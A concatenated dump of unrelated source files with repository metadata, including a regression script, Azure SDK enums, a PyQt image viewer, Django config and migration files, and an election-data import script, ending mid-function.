756 1 0.502317 0.436516 0.688344
1937 1 0.502036 0.499138 0.877494
1661 1 0.877441 0.878671 0.500302
1586 1 0.566439 0.688273 0.496768
1809 1 0.505914 0.493486 0.752876
2020 1 1.0002 0.940374 0.935096
836 1 1.00101 0.311922 0.811263
1554 1 0.564346 0.562004 0.498796
852 1 0.506821 0.310508 0.808788
1074 1 0.563563 0.687265 1.00346
1540 1 0.998003 0.558044 0.558027
673 1 1.00738 0.124951 0.623239
740 1 1.00124 0.43656 0.682158
548 1 0.998463 0.185125 0.564347
1654 1 0.689232 0.939878 0.499937
1658 1 0.808957 0.938682 0.507323
1585 1 0.504732 0.628264 0.496457
1082 1 0.814379 0.684687 1.00247
21 1 0.61988 0.000150999 1.00165
1110 1 0.690073 0.809348 1.00194
118 1 0.688528 0.438766 0.996812
1146 1 0.8104 0.939979 1.00041
1114 1 0.816671 0.81506 1.00052
113 1 0.4993 0.371679 0.998608
125 1 0.87007 0.371168 1.0022
1650 1 0.558143 0.937179 0.504975
1150 1 0.94005 0.938008 0.996478
1617 1 0.501506 0.753439 0.504246
606 1 0.935426 0.313179 0.50003
633 1 0.744173 0.381078 0.49725
1590 1 0.683331 0.692264 0.502539
1557 1 0.623861 0.500824 0.50135
26 1 0.808787 0.068226 1.00226
1622 1 0.685959 0.813626 0.507248
1594 1 0.815898 0.692924 0.504871
33 1 0.998463 0.122122 0.998915
574 1 0.935994 0.188305 0.502992
1598 1 0.93674 0.691651 0.503403
1138 1 0.561145 0.937173 0.995046
1142 1 0.684473 0.937888 1.00198
| [
"[email protected]"
]
| |
8330dd686199cc1515e5595364a6d6fc22e245f6 | 5d9105fc2b36967ae99a09649021cdcaf71a72ed | /Project1_804587205_204617837_004589213_204587029/polynomial/plot_underfitting_overfitting.py | 349f38db338997e934f086c19f6c5724fb38a987 | []
| no_license | ishan793/EE239-Big-Data-Analysis | 2a9e0a126f9054798f67b233f2fc50c5f7380225 | 310080a39f111705b2271a9c61b61b3f5b33e91e | refs/heads/master | 2020-04-09T20:06:38.207491 | 2016-02-28T21:43:03 | 2016-02-28T21:43:03 | 50,261,455 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,557 | py | """
============================
Underfitting vs. Overfitting
============================
This example demonstrates the problems of underfitting and overfitting and
how we can use linear regression with polynomial features to approximate
nonlinear functions. The plot shows the function that we want to approximate,
which is a part of the cosine function. In addition, the samples from the
real function and the approximations of different models are displayed. The
models have polynomial features of different degrees. We can see that a
linear function (polynomial with degree 1) is not sufficient to fit the
training samples. This is called **underfitting**. A polynomial of degree 4
approximates the true function almost perfectly. However, for higher degrees
the model will **overfit** the training data, i.e. it learns the noise of the
training data.
We evaluate quantitatively **overfitting** / **underfitting** by using
cross-validation. We calculate the mean squared error (MSE) on the validation
set, the higher, the less likely the model generalizes correctly from the
training data.
"""
#print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import LinearRegression
from sklearn import cross_validation
import pickle
from sklearn.metrics import mean_squared_error
# Fix the RNG seed so repeated runs are reproducible.
np.random.seed(0)
#data = pickle.load( open( "housing_data.pickle", "rb" ) )
# Load the pickled dataset: a dict with feature matrix under 'x' and the
# target vector under 'y'.  NOTE(review): loading pickle from disk is only
# safe because this file is produced locally by the same project.
data=pickle.load(open('network.pickle','rb'))
X=np.array(data['x'],dtype='float')
y=np.array(data['y'],dtype='float')
print X.shape
n_samples=X.shape[0]
# Reshape the target into a column vector of shape (n_samples, 1).
y=np.reshape(y,(n_samples,1))
print y.shape
# Polynomial degrees to evaluate; currently only degree 1 (plain linear fit).
degrees = [1]
avg_score=[]
fixed_score=[]
# Fixed train/test split: the first 50 rows are the test set, rows 51..end
# are the training set.
# NOTE(review): row index 50 belongs to neither split (test is [0:50],
# train is [51:]) -- presumably unintentional; confirm and use X[50:] if so.
X_test=X[0:50,:]
y_test=y[0:50,:]
X_train=X[51:,:]
y_train=y[51:,:]
#plt.figure(figsize=(14, 5))
# The triple-quoted block below is disabled code kept for reference: it
# scored each degree with 10-fold cross-validation (RMSE averaged over
# folds) instead of the fixed split used further down.
'''for i in range(len(degrees)):
    #ax = plt.subplot(1, len(degrees), i + 1)
    #plt.setp(ax, xticks=(), yticks=())
    polynomial_features = PolynomialFeatures(degree=degrees[i],interaction_only=True,
                                             include_bias=False)
    linear_regression = LinearRegression()
    pipeline = Pipeline([("polynomial_features", polynomial_features),
                         ("linear_regression", linear_regression)])
    #pipeline.fit(X,y)
    # Evaluate the models using crossvalidation
    scores = cross_validation.cross_val_score(pipeline,
        X, y, scoring="mean_squared_error", cv=10)
    scores=np.average((abs(scores)**0.5))
    avg_score.append(scores)
    #plt.plot(X_test, true_fun(X_test), label="True function")
    #plt.scatter(X, y, label="Samples")
    #plt.xlabel("x")
    #plt.ylabel("y")
    #plt.xlim((0, 1))
    #plt.ylim((-2, 2))
    #plt.legend(loc="best")
    #plt.title("Degree {}\nMSE = {:.2e}(+/- {:.2e})".format(
    #degrees[i], -scores.mean(), scores.std()))
    #plt.show()'''
'''print avg_score
plt.scatter(degrees,avg_score)
plt.show()'''
# Active evaluation: for every degree, fit polynomial regression on the
# training split and record the test-set RMSE (sqrt of the MSE).
plt.figure(figsize=(14,5))
for i in range(len(degrees)):
    ax=plt.subplot(1,len(degrees),i+1)
    plt.setp(ax,xticks=(),yticks=())
    poly=PolynomialFeatures(degree=degrees[i])
    X_train_trans = poly.fit_transform(X_train)
    # NOTE(review): fit_transform is called on the test set as well; for
    # PolynomialFeatures the result matches transform(), but transform()
    # alone is the conventional call -- confirm before changing.
    X_test_trans = poly.fit_transform(X_test)
    regr =LinearRegression()
    regr.fit(X_train_trans,y_train)
    y_pred = regr.predict(X_test_trans)
    # **0.5 converts the mean squared error into RMSE.
    fixed_score.append((mean_squared_error(y_test,y_pred)**0.5))
    #plt.plot(range(len(y_test)),(y_test-pipeline.predict(X_test)),range(len(y_test)),[0]*len(y_test))
print fixed_score
plt.scatter(degrees,fixed_score)
plt.show()
| [
"[email protected]"
]
| |
25b980a0be5f061c6bdc488b9c6e51969e8a81c7 | ceb5b7c3882b2bf3f53219356e914462c680f059 | /azure-mgmt-compute/azure/mgmt/compute/containerservice/v2017_01_31/models/container_service_client_enums.py | 279f5dcb9d3ff37bd26b6e9a9c88b555f28c3dff | [
"MIT"
]
| permissive | codalab/azure-sdk-for-python | b712da2a377cfa526e0ffa4fa40408e6a81e48e3 | f4c92d02d46fcdee9da430a18a394b108a2f8920 | refs/heads/master | 2021-01-19T14:40:23.567035 | 2017-04-11T22:49:13 | 2017-04-11T22:49:13 | 88,180,409 | 1 | 0 | null | 2017-04-13T15:36:45 | 2017-04-13T15:36:44 | null | UTF-8 | Python | false | false | 2,291 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class ContainerServiceOchestratorTypes(Enum):
    """Orchestrator platforms accepted by the Azure Container Service API.

    NOTE: "Ochestrator" (sic) is the name shipped in this generated SDK
    version; renaming it would break existing callers.
    """

    swarm = "Swarm"
    dcos = "DCOS"
    custom = "Custom"
    kubernetes = "Kubernetes"
class ContainerServiceVMSizeTypes(Enum):
    """Azure VM sizes available for Container Service nodes.

    Each value is the exact size string the Azure REST API expects.
    """

    # A-series.
    standard_a0 = "Standard_A0"
    standard_a1 = "Standard_A1"
    standard_a2 = "Standard_A2"
    standard_a3 = "Standard_A3"
    standard_a4 = "Standard_A4"
    standard_a5 = "Standard_A5"
    standard_a6 = "Standard_A6"
    standard_a7 = "Standard_A7"
    standard_a8 = "Standard_A8"
    standard_a9 = "Standard_A9"
    standard_a10 = "Standard_A10"
    standard_a11 = "Standard_A11"
    # D-series.
    standard_d1 = "Standard_D1"
    standard_d2 = "Standard_D2"
    standard_d3 = "Standard_D3"
    standard_d4 = "Standard_D4"
    standard_d11 = "Standard_D11"
    standard_d12 = "Standard_D12"
    standard_d13 = "Standard_D13"
    standard_d14 = "Standard_D14"
    # Dv2-series.
    standard_d1_v2 = "Standard_D1_v2"
    standard_d2_v2 = "Standard_D2_v2"
    standard_d3_v2 = "Standard_D3_v2"
    standard_d4_v2 = "Standard_D4_v2"
    standard_d5_v2 = "Standard_D5_v2"
    standard_d11_v2 = "Standard_D11_v2"
    standard_d12_v2 = "Standard_D12_v2"
    standard_d13_v2 = "Standard_D13_v2"
    standard_d14_v2 = "Standard_D14_v2"
    # G-series.
    standard_g1 = "Standard_G1"
    standard_g2 = "Standard_G2"
    standard_g3 = "Standard_G3"
    standard_g4 = "Standard_G4"
    standard_g5 = "Standard_G5"
    # DS-series (premium-storage capable counterparts of the D-series).
    standard_ds1 = "Standard_DS1"
    standard_ds2 = "Standard_DS2"
    standard_ds3 = "Standard_DS3"
    standard_ds4 = "Standard_DS4"
    standard_ds11 = "Standard_DS11"
    standard_ds12 = "Standard_DS12"
    standard_ds13 = "Standard_DS13"
    standard_ds14 = "Standard_DS14"
    # GS-series (premium-storage capable counterparts of the G-series).
    standard_gs1 = "Standard_GS1"
    standard_gs2 = "Standard_GS2"
    standard_gs3 = "Standard_GS3"
    standard_gs4 = "Standard_GS4"
    standard_gs5 = "Standard_GS5"
| [
"[email protected]"
]
| |
447d86e8e9209462fd50b2b94da10ea4ce9f191d | 582cf2295d4b4666421da511507858435912ea30 | /Sample.py | 0a4cf81985e2de9af19913e6e31e192aa913f273 | []
| no_license | limjisooooooo/z | bfe71ba18fe186e02be5e7908d3068d86e9f63db | cf0dc6f3de63decd69ecd7f139740334807054bc | refs/heads/master | 2020-04-27T04:13:53.611372 | 2019-03-28T08:46:28 | 2019-03-28T08:46:28 | 174,047,811 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 838 | py | import sys
import base64
from PyQt5.QtWidgets import *
#from PyQt5.QtGui import *
class Form(QMainWindow):
    """Minimal image-viewer window.

    Shows a QTextBrowser plus a small button; clicking the button opens a
    file dialog and appends the chosen image to the browser inline as a
    base64 data URI.
    """

    def __init__(self):
        super().__init__()
        self.browser = QTextBrowser(self)
        self.browser.setGeometry(0, 0, 471, 401)
        self.setGeometry(0, 0, 500, 500)
        self.btnFile = QPushButton(self)
        self.btnFile.setGeometry(2, 430, 25, 25)
        self.btnFile.clicked.connect(self.fopen)
        self.show()
        self.setWindowTitle('Sample')

    def fopen(self):
        """Prompt for an image file and embed it in the browser as an
        inline base64 <img> tag. Does nothing if the dialog is cancelled."""
        FileName, Filter = QFileDialog.getOpenFileUrl()
        if FileName.path() != "":
            # NOTE(review): stripping the leading character assumes a
            # Windows-style URL path ('/C:/...'); QUrl.toLocalFile() would be
            # the portable call -- confirm target platform before changing.
            # Context manager closes the file even if read/encode raises
            # (the original leaked the handle on exceptions).
            with open(FileName.path()[1:], 'rb') as f:
                data = base64.b64encode(f.read())
            #print(data)
            # alt is double-quoted: the apostrophe in "Can't" prematurely
            # terminated the original single-quoted HTML attribute.
            self.browser.append(
                "<img src='data:image/jpeg;base64, " + data.decode()
                + "' alt=\"Image Can't Load\"/>")


if __name__ == '__main__':
    app = QApplication(sys.argv)
    w = Form()
    sys.exit(app.exec())
"[email protected]"
]
| |
d9b1642074ff790c14fedd3afa80bc618136166c | 2191d0e0d9fbec3dcef93386ba6c691d222bfed4 | /new_user/migrations/0015_auto_20170428_1826.py | 5aed1ff9f421cb90cdfeb799f1cda59759a131cd | []
| no_license | AnkitaVikramShetty/airbnbNewUserPredictions | 19e7a74bd39cc663c23e0a7c407d9a151a37a954 | 86338384d565fcd017f18944559165ee806b751f | refs/heads/master | 2021-01-19T04:40:59.235835 | 2017-05-02T16:14:55 | 2017-05-02T16:14:55 | 87,385,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 579 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Adds the 'population_in_thousands' and 'year' columns to the
    # age_gender_bkts table.

    dependencies = [
        ('new_user', '0014_auto_20170428_1119'),
    ]
    operations = [
        migrations.AddField(
            model_name='age_gender_bkts',
            name='population_in_thousands',
            # Nullable so pre-existing rows need no backfill/default.
            field=models.FloatField(null=True),
        ),
        migrations.AddField(
            model_name='age_gender_bkts',
            name='year',
            # Nullable for the same reason as above.
            field=models.FloatField(null=True),
        ),
    ]
| [
"[email protected]"
]
| |
3b30e4f81446dc8646720b7e1ef823a4cf0e1cba | e67822aa34c5d121978732b33a2bf85613b8fc41 | /chapter4/problem5.py | 2867d2e1eef48d0f06bdb66e7338affb6a062460 | []
| no_license | Kwon1995-2/BC_Python | c3a6cb450fbe728d368a840c03c0817e8dcc46fa | d3df813498a72367dc8f6a4f9efbbbca072de700 | refs/heads/master | 2023-03-18T21:39:45.621360 | 2021-03-20T13:50:39 | 2021-03-20T13:50:39 | 298,744,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | """ 크기가 같은 두개의 리스트 L, M을 생성하고
두 리스트의 각 요소 합으로 구성되는 새로운 리스트를
생성하라
L=[1,2,3] M=[4,5,6] => [5, 7, 9]"""
L = [1,2,3]
M = [4, 5, 6]
LM = []
for i in range(0,len(L)):
LM.insert(i, L[i]+M[i])
print(LM)
| [
"[email protected]"
]
| |
2ae5a8847cf48e47a874c90b02e69013112279ba | f9faa75c7a0608f5a03fde26fb494de9bfdaa895 | /WEEK 1/part01-e05_two_dice/src/two_dice.py | a650e13f6172340c085080170522dc497bc76781 | []
| no_license | LeguizamonLuciano/DataAnalysisHelsinkiUni | 16a8bead739b35a75f9d72c5691eedee70efc4eb | 84af79815a5bcd497f731c4c24a22bb569db0c7f | refs/heads/main | 2023-01-15T20:18:01.487593 | 2020-11-09T23:11:19 | 2020-11-09T23:11:19 | 307,580,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | #!/usr/bin/env python3
def main():
    """Print every ordered pair of two six-sided die faces whose sum is 5."""
    faces = range(1, 7)
    for first in faces:
        for second in faces:
            # Guard clause: skip combinations that do not hit the target.
            if first + second != 5:
                continue
            print((first, second))


if __name__ == "__main__":
    main()
| [
"[email protected]"
]
| |
d41c0a0dcfbff280e11e9fa43fbd1a64b889ce22 | 6444935a3e304e0d8f0fc4cf7fbb7153621cfc53 | /technosphere_python_backend/homeworks/06_07/project/project/urls.py | 6f1f921969039500acc29fa06730692f4e48846f | []
| no_license | SVasi1yev/other | d1032871dc36a22cc2b556d4cbf6c0dc0c968e87 | 1c31090e7b3e0ff04e00b4f5b0b7ac917fe83ed2 | refs/heads/master | 2023-08-04T16:28:05.163894 | 2023-07-17T14:32:09 | 2023-07-17T14:32:09 | 138,393,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,141 | py | """project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views as auth_views
import sys
sys.path.append('..')
from forum import views
# Project-level URL routes.
urlpatterns = [
    # Django admin site.
    path('admin/', admin.site.urls),
    # Everything under forum/ is delegated to the forum app's URLconf.
    path('forum/', include('forum.urls')),
    # Login view implemented in the forum app.
    path('login/', views.login, name='login'),
    # Built-in logout view from django.contrib.auth.
    path('logout/', auth_views.LogoutView.as_view(), name='logout'),
    # OAuth routes from social_django, namespaced as 'social'.
    path('social_auth/', include('social_django.urls', namespace='social')),
    # Site landing page.
    path('', views.home, name='home')
]
| [
"[email protected]"
]
| |
c9a09e5b6cfdc643895b716f62e61cddeaf1f9ac | fe90bf63c34511ec9a4d7cb5a90957fbbb03a504 | /boundary_layer/builders/base.py | 06573b22f26400966c3a38fb8464d794b797405d | [
"Apache-2.0"
]
| permissive | etsy/boundary-layer | 778b115f94efc5d50986a289daf3ad265b38926c | c29594957c1fb47e308fcc89f7edcefc0797fc89 | refs/heads/master | 2023-07-21T17:03:15.769537 | 2023-01-04T14:05:53 | 2023-01-04T14:05:53 | 142,857,095 | 263 | 67 | Apache-2.0 | 2023-07-19T19:57:04 | 2018-07-30T09:51:52 | Python | UTF-8 | Python | false | false | 8,829 | py | # -*- coding: utf-8 -*-
# Copyright 2018 Etsy Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from six.moves import filter
from jinja2 import Environment, PackageLoader
from boundary_layer.builders import util
from boundary_layer.logger import logger
from boundary_layer.registry import NodeTypes
from boundary_layer.util import sanitize_operator_name
from boundary_layer.containers import WorkflowMetadata
class DagBuilderBase(object):
    """Abstract base for builders that turn a parsed boundary-layer workflow
    (dag spec + dependency graph) into generated DAG source text.

    Subclasses supply the surrounding boilerplate (preamble/epilogue) and
    decide whether rendered operators are indented.
    """

    __metaclass__ = abc.ABCMeta  # NOTE(review): py2-style ABC declaration; has no effect on py3

    @abc.abstractproperty
    def indent_operators(self):
        # Subclasses return True when rendered operators must be indented
        # one level (see build()).
        pass

    @abc.abstractmethod
    def preamble(self):
        # Text emitted before any rendered operators.
        pass

    @abc.abstractmethod
    def epilogue(self):
        # Text emitted after all rendered operators.
        pass

    @staticmethod
    def _build_jinja_env():
        """Build the Jinja2 environment loading this package's templates and
        registering the custom filters those templates use."""
        jenv = Environment(
            loader=PackageLoader('boundary_layer', 'builders/templates'),
            trim_blocks=True)
        jenv.filters['format_value'] = util.format_value
        jenv.filters['add_leading_spaces'] = util.add_leading_spaces
        jenv.filters['comment'] = util.comment
        jenv.filters['sanitize_operator_name'] = sanitize_operator_name
        jenv.filters['verbatim'] = util.verbatim
        return jenv

    def get_jinja_template(self, template_filename):
        """Load a template by filename from a freshly built environment."""
        return self._build_jinja_env().get_template(template_filename)

    def get_imports(self):
        """Collect the union of import requirements from the dag spec and
        from every node in the primary and secondary graphs.

        Returns a dict with:
          'modules': set of module names to import wholesale
          'objects': dict mapping module name -> set of names to import
        """
        all_nodes = self.specs.graphs.primary.ordered() + \
            [node for graph in self.specs.graphs.secondary
             for node in graph.ordered()]
        all_imports = [self.dag.get('imports', {})] + \
            [node.imports() for node in all_nodes]
        objects = {}
        modules = set()
        for node_imports in all_imports:
            modules |= set(node_imports.get('modules', []))
            for item in node_imports.get('objects', []):
                objects.setdefault(item['module'], set())
                objects[item['module']] |= set(item['objects'])
        return {
            'modules': modules,
            'objects': objects,
        }

    def __init__(
            self,
            dag,
            graph,
            reference_path,
            specs,
            metadata=None,
            referring_node=None,
            sub_dag_builder=None,
            generator_builder=None):
        """Store the spec, graph and collaborating builders.

        :param dag: parsed dag spec (dict-like) being rendered
        :param graph: dependency graph for this dag
        :param reference_path: list of names identifying this dag's position
            in the primary/secondary hierarchy (used for dag-id construction)
        :param specs: full parsed workflow specs (primary + secondary)
        :param metadata: optional WorkflowMetadata; defaults to an empty one
        :param referring_node: node in the parent dag that referenced this
            dag, when building a sub-dag or generator target
        :param sub_dag_builder: builder class used for SUBDAG targets
        :param generator_builder: builder class used for GENERATOR targets
        """
        self.dag = dag
        self.graph = graph
        self.reference_path = reference_path
        self.specs = specs
        self.metadata = metadata or WorkflowMetadata(None, None)
        self.referring_node = referring_node
        self.sub_dag_builder = sub_dag_builder
        self.generator_builder = generator_builder

    @property
    def default_task_args(self):
        # Default task args come from the primary dag spec only.
        return self.specs.parsed.primary.get('default_task_args', {})

    def build_dag_id(self):
        """Derive the dag id from this builder's position in the hierarchy."""
        return util.construct_dag_name(self.reference_path)

    def render_operator(self, node):
        """Render one node through the template matching its type, excluding
        any generator nodes from its upstream/downstream dependency lists."""
        template_filename = None
        if node.type == NodeTypes.GENERATOR:
            template_filename = 'generator_operator.j2'
        elif node.type == NodeTypes.SUBDAG:
            template_filename = 'subdag_operator.j2'
        else:
            template_filename = 'operator.j2'
        template = self.get_jinja_template(template_filename)
        # Do not set upstream/downstream dependencies that involve generator nodes
        # at this stage; those are all set within the generator nodes, and if they are
        # set here, there will be python errors due to references to operators that
        # do not exist (generators do not correspond to operators)
        generator_nodes = frozenset(
            gen.name for gen in self.graph.graph.nodes
            if gen.type == NodeTypes.GENERATOR)
        upstream_deps = frozenset(
            dep.name for dep in self.graph.upstream_dependency_set(node))
        if generator_nodes & upstream_deps:
            logger.debug(
                'Not passing upstream generator dependencies `%s` to '
                'operator template for node `%s`',
                generator_nodes & upstream_deps,
                node.name)
        downstream_deps = frozenset(
            dep.name for dep in self.graph.downstream_dependency_set(node))
        if generator_nodes & downstream_deps:
            logger.debug(
                'Not passing downstream generator dependencies `%s` to '
                'operator template for node `%s`',
                generator_nodes & downstream_deps,
                node.name)
        return template.render(
            node=node,
            args=node.operator_args,
            upstream_dependencies=list(upstream_deps - generator_nodes),
            downstream_dependencies=list(downstream_deps - generator_nodes),
        )

    def get_secondary_dag(self, target):
        """Return the secondary dag spec named `target`.

        :raises ValueError: if no secondary dag, or more than one, matches.
        """
        hits = [dag for dag in self.specs.parsed.secondary
                if dag['name'] == target]
        if not hits:
            raise ValueError('Secondary dag id {} not found'.format(target))
        if len(hits) > 1:
            raise ValueError(
                'Multiple hits for secondary dag id {}'.format(target))
        return hits[0]

    def get_secondary_graph(self, target):
        """ Get the graph corresponding to the target. This is kind of ugly,
            a consequence of the way in which we currently store dags separately
            from graphs.  Ideally there would be only one of the two methods,
            get_secondary_(dag|graph).
        """
        self.get_secondary_dag(target)  # does the checking
        for (idx, dag) in enumerate(self.specs.parsed.secondary):
            if dag['name'] == target:
                return self.specs.graphs.secondary[idx]
        raise Exception("should not be possible")

    def get_target_builder_cls(self, node_type):
        """Return the builder class for a GENERATOR or SUBDAG node type.

        :raises Exception: if the required builder was not provided, or the
            node type has no associated target builder.
        """
        if node_type == NodeTypes.GENERATOR:
            if not self.generator_builder:
                raise Exception('No generator builder is defined!')
            return self.generator_builder
        elif node_type == NodeTypes.SUBDAG:
            if not self.sub_dag_builder:
                raise Exception('No sub_dag builder is defined!')
            return self.sub_dag_builder
        raise Exception(
            'Node type `{}` has no known target builder'.format(
                node_type))

    def render_target(self, node):
        """Build and render the secondary dag referenced by `node.target`,
        using the builder class appropriate for the node's type."""
        builder = self.get_target_builder_cls(node.type)(
            dag=self.get_secondary_dag(node.target),
            graph=self.get_secondary_graph(node.target),
            reference_path=self.reference_path + [node.name],
            specs=self.specs,
            referring_node=node,
            sub_dag_builder=self.sub_dag_builder,
            generator_builder=self.generator_builder,
        )
        return builder.build()

    def build(self):
        """Render the full dag: preamble, operators (in graph order), then
        epilogue, joined with newlines. Generator operators are emitted after
        all other operators because they reference both their upstream and
        downstream components."""
        # Keep track of which subdag and generator targets have been rendered.
        # These targets can be reused by multiple referring nodes.
        rendered_targets = set()
        # We build the result by appending components to an array and then
        # joining together at the end
        components = [self.preamble()]
        # generators are rendered last, because they refer to both upstream and
        # downstream components when they express their dependencies
        generator_components = []
        for node in self.graph.ordered():
            operator = None
            if node.type in set([NodeTypes.GENERATOR, NodeTypes.SUBDAG]) \
                    and node.target not in rendered_targets:
                # First reference to this target: render the target dag
                # itself followed by the referring operator.
                operator = '\n'.join([
                    self.render_target(node),
                    self.render_operator(node)])
                rendered_targets.add(node.target)
            elif node.type in NodeTypes:
                operator = self.render_operator(node)
            else:
                raise Exception(
                    'Unrecognized operator type: {}'.format(node.type))
            # add the rendered operator to the appropriate components list
            (components if node.type != NodeTypes.GENERATOR else generator_components).append(
                util.add_leading_spaces(
                    operator,
                    1 if self.indent_operators else 0))
        components += generator_components
        components.append(self.epilogue())
        # filter(None, ...) drops empty preamble/epilogue/operator strings.
        return '\n'.join(filter(None, components))
| [
"[email protected]"
]
| |
985dad9eac8bbe27fa5b3adfb04734809e871ce4 | ae16f9dd815605e5f52f27dda77bd735abafb587 | /parser/councilors/elections_config.py | 1bf0e2a7db9c45f4024b1026e1cd6c38e1f368c0 | [
"CC0-1.0"
]
| permissive | travishen/councilor-voter-guide | aa4a1aa3b86db9ca40b291baf461ff0330a369c0 | 09d9365676335854b2d4d0981f5cb925adf4c958 | refs/heads/master | 2020-04-13T10:09:07.688276 | 2018-11-28T14:51:05 | 2018-11-28T14:51:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,827 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.path.append('../')
import re
import json
import psycopg2
import ast
from sys import argv
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import db_settings
# Shared PostgreSQL connection/cursor; commits are issued explicitly below.
conn = db_settings.con()
c = conn.cursor()
# argv[1] is a Python-literal dict, e.g. "{'election_year': '2018'}".
election_year = ast.literal_eval(argv[1])['election_year']
def parse_districts(county, districts):
    """Split a raw constituency description into district names.

    Returns (district_names, category) where ``category`` is the
    aboriginal-constituency suffix (平地原住民/山地原住民) if present,
    otherwise None.
    """
    # Strip the leading "居住"/"【" marker from the raw string.
    districts = re.sub(u'^(居住|【)', '', districts)
    # Peel off an aboriginal-constituency suffix; it becomes the category.
    category = re.search(u'(平地原住民|山地原住民)$', districts)
    districts = re.sub(u'(平地原住民|山地原住民)$', '', districts)
    if category:
        category = category.group()
    districts = re.sub(u'(】|之)', '', districts)
    parsed = []
    if districts:
        county_stem = re.sub(u'[縣市]$', '', county)
        for name in districts.split(u'、'):
            if len(name) == 2:
                # A two-character name is already bare: fall back to the
                # raw split of the whole string and stop processing.
                parsed = districts.split(u'、')
                break
            if not re.search(county_stem, name):
                # Drop the trailing 鄉/鎮/市/區 suffix from full names.
                name = re.sub(u'[鄉鎮市區]$', '', name)
            parsed.append(name)
    return parsed, category
# update constituencies
# Load this year's constituency definitions and group them per county.
constituencies = json.load(open('../../voter_guide/static/json/dest/constituencies_%s.json' % election_year))
counties = {}
for region in constituencies:
    if region['county'] not in counties.keys():
        counties.update({
            region['county']: {
                'regions': [],
                'duplicated': []
            }
        })
    districts_list, category = parse_districts(region['county'], region['district'])
    # Human-readable district label: aboriginal constituencies are shown as
    # "category(districts)" or "category(全<county>)" when county-wide.
    if category:
        if districts_list:
            district = u'%s(%s)' % (category, u'、'.join(districts_list))
        else:
            district = u'%s(%s)' % (category, u'全%s' % region['county'])
    else:
        district = u'、'.join(districts_list)
    counties[region['county']]['regions'].append({
        'constituency': region['constituency'],
        'districts_list': districts_list,
        'district': district,
        'category': category
    })
    # Keep the candidates table's district label in sync.
    c.execute('''
        update candidates_terms
        set district = %s
        where election_year = %s and county = %s and constituency = %s
    ''', (district, election_year, region['county'], region['constituency']))
# Pull seat counts from the shared Google Sheet (councilor worksheet only).
scope = ['https://spreadsheets.google.com/feeds']
credentials = ServiceAccountCredentials.from_json_keyfile_name('credential.json', scope)
gc = gspread.authorize(credentials)
sh = gc.open_by_key('10zFDmMF9CJDXSIENXO8iJXKE5CLBY62i_mSeqe_qDug')
worksheets = sh.worksheets()
for wks in worksheets:
    rows = wks.get_all_records()
    if wks.title == u'議員':
        for row in rows:
            print row['county'], row['constituency']
            # Only rows with a current-term seat count carry data.
            # NOTE(review): constituency is assumed to be 1-based — verify.
            if row['count_this']:
                counties[row['county']]['regions'][int(row['constituency'])-1]['elected_count_pre'] = row['count_pre']
                counties[row['county']]['regions'][int(row['constituency'])-1]['elected_count'] = row['count_this']
                counties[row['county']]['regions'][int(row['constituency'])-1]['reserved_seats'] = row['reserved_seats']
            else:
                continue
# Merge the constituency map into the election's jsonb config blob.
config = json.dumps({'constituencies': counties})
c.execute('''
    INSERT INTO elections_elections(id, data)
    VALUES (%s, %s)
    ON CONFLICT (id)
    DO UPDATE
    SET data = (COALESCE(elections_elections.data, '{}'::jsonb) || %s::jsonb)
''', [election_year, config, config])
conn.commit()
# update constituency_change
district_versions = json.load(open('../district_versions.json'))
config = json.dumps({'constituency_change': district_versions.get(election_year, {})})
c.execute('''
    INSERT INTO elections_elections(id, data)
    VALUES (%s, %s)
    ON CONFLICT (id)
    DO UPDATE
    SET data = (COALESCE(elections_elections.data, '{}'::jsonb) || %s::jsonb)
''', [election_year, config, config])
conn.commit()
| [
"[email protected]"
]
| |
ee8d4a24f7c6068b54efb883495622825593dcad | 065694179b7a132d989c373573a0e89686cc2c8c | /untitled/venv/include/task1.py | 9fcae00b5f7e63cef0d7248881b10293e65e6e5b | []
| no_license | vksychev/PythonPlayground | ff267b1173f43cae2d11634b70e75c0aa3f715aa | 99c4c1471b4e3e5a528486a58bd92cfd42b33c0e | refs/heads/master | 2020-03-21T06:11:23.144147 | 2018-12-27T14:56:07 | 2018-12-27T14:56:07 | 138,204,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | import math
def genA(n):
    """Return [sin(0), sin(1), ..., sin(n-1)].

    Idiom fix: the original built the list with a manual append loop and a
    pointless ``new_element`` temporary; a comprehension is equivalent.
    """
    return [math.sin(i) for i in range(n)]
def solution(A):
    """Count the monotone runs in A.

    Equal neighbours extend the current run; the answer is the number of
    direction changes plus one (a non-empty/empty sequence counts as 1).
    """
    runs = 1
    prev_step = 0
    for left, right in zip(A, A[1:]):
